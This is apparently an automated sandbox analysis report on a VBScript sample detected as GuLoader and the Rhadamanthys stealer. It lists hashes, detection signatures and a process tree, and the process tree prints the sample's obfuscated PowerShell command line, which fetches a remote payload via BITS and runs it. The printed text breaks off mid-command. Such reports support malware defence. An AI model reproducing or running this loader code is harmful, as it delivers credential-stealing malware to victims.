Edit tour
Windows
Analysis Report
tmkSAOF3GM.vbs
Overview
General Information
Sample name: | tmkSAOF3GM.vbsrenamed because original name is a hash value |
Original sample name: | 25a284f3b492b1ef2573a114972267914935fdd0970888c32e96bdf2f5cf132f.vbs |
Analysis ID: | 1578212 |
MD5: | 3b95d9711bf763678d21b1bdaacc2981 |
SHA1: | 0ba3540093886e7f97d41bcd0991f24e7c7853ed |
SHA256: | 25a284f3b492b1ef2573a114972267914935fdd0970888c32e96bdf2f5cf132f |
Tags: | vbsuser-JAMESWT_MHT |
Infos: | |
Detection
GuLoader, RHADAMANTHYS
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected RHADAMANTHYS Stealer
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Powershell uses Background Intelligent Transfer Service (BITS)
Sigma detected: WScript or CScript Dropper
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Keylogger Generic
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 7636 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\tmkSA OF3GM.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 7728 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" "Function Opinions ( $Sold){For ($Peder=7; $Peder -l t $Sold.Le ngth-1; $P eder+=8){ $Becifr20+ =$Sold.Sub string($Pe der, 1);}$ Becifr20;} $Becifr200 1=Opinions 'Udkonkui recomple C hilidxClub bin ';$Bec ifr2002=Op inions 'Me treneTSkry derrFokuse ra Nonappn BuckarsAl dehydfCita tioe Stupi drTrykkerr FollicuiFo rkontn Ind delg Ghost l ';functi on Folkemu nd ($Kvke) {& ($Bec ifr2001) ( $Kvke);}$E ksped=Opin ions ' Spl itfhhighbr ot Querimt MyrsiphpAy missasTril loe:Hjemme h/ Artens/ Crescogwbe vogtew Unp anewTristr a. Vokslya Godkensbe deviltErgo graeFiligr anPlanlgnt EmhtteoeDe nnisgrHuld sagpNiveau orInsectoi ValentisIn spmiseRrig eresFudder l.Infantec SkabekoHe liconmSkil lev.Raderi np Maanesk Upaavir/St arkesm Kol onisAlunga r/ BabkasN BastideoFo edselnIndt gtsn Atomb o2svogers1 Duelbe5aa benhe.Metr ummpPapirp erDesignlm Worsset '; $Becifr200 0=Opinions 'Buldogg$ PsychoagSa xofonl Thr obloAfhugg cbTrichopa Roduddl B ighte:Unth roaT Embra saLissomnc Keglestkto mbololSolu tioe Overr osTjenests KvllereeEr klaer2 Pas tic2Tilspr g1Ohmensd8 Afsvkke Hm skoen=Diac ety Privat eSBenecept PentaplaHv edomrrMero tomtReserv e-ReductiB ReautheiMe galoctAffi xiasFinlnd eTushabtir IntrabraKo mpagnnMaim onisKavale rfSekundoe OcotillrPa trulj Daad yre-Outdeg rSMindedio SteropeuEn noblerprop ortcFornrm ee Gaases Inhomog$Tr ipennEGela tinkParoxy ssLommensp GropedoePi lenhjdMono pol mellem m-PastoraD BrndboreFo rfrersUnde rfotHurtig ri geisson FlabbieaPe culiatUnfe liniMusica loFeminoln Vuggevi En garba$Teks treTBolsje vaFilmfroc FlinchekWi ndsurlGump ekaeCustom isSvirrefs Oprikkee D atako2Svin gni2 Syste m1Gracise2 Memora '; Folkemund (Opinions 'Oliearb$T hermotgSvi ndlelAffat teoBlgenex bParadigaM rkbarelDel ouse: Kvin deTBivognr a Pectinc NonbudkBii ndtglPlani sheCryptoc sOvervinsB ootstreTel angi2svejs er2Notewis 1Omstnin2F ugleko=Man dler$Murkr oneVenskab nStandarvD emenss:Kla ddebaSpiri tup Hdersp pBandernd Cybelea Fr isketOscul araElkhorn ') ;Folke mund (Opin ions 'Vesp ertICanamo am Podophp RaketvoPo rionsrFors tant dimna f- SprayeM BevrtnioPr ogramdTrep aneuBesieg elBygninge Fodred He matocB Cou peeiStambo rtDameskrs CartogrTHa wsepirTyve kroa Skriv enFlaadeos Metrecf S errate Slu knirhypoch n ') ;$Tac klesse2212 =$Tackless e2212+'\In te.reg' ;F olkemund ( Opinions ' Swazil$Li vligegCycl ohel Dartl eo Paternb thengeaso rehealpolr tch:Boligm iTDecoloua RevanchcNo nconfkForm atklIvorin eeCoactivs NailapsHe rediteMoor man2Sagvol d2Hertugd1 Langtur7Ot ectom=Even tua(Hetero gTPikakefe nydannesUd majnitUndl ade-Ultram aPWarlocka NymphomtVe rdenehCric ket Concep t$FagbevgT AcetaraAm minoscheni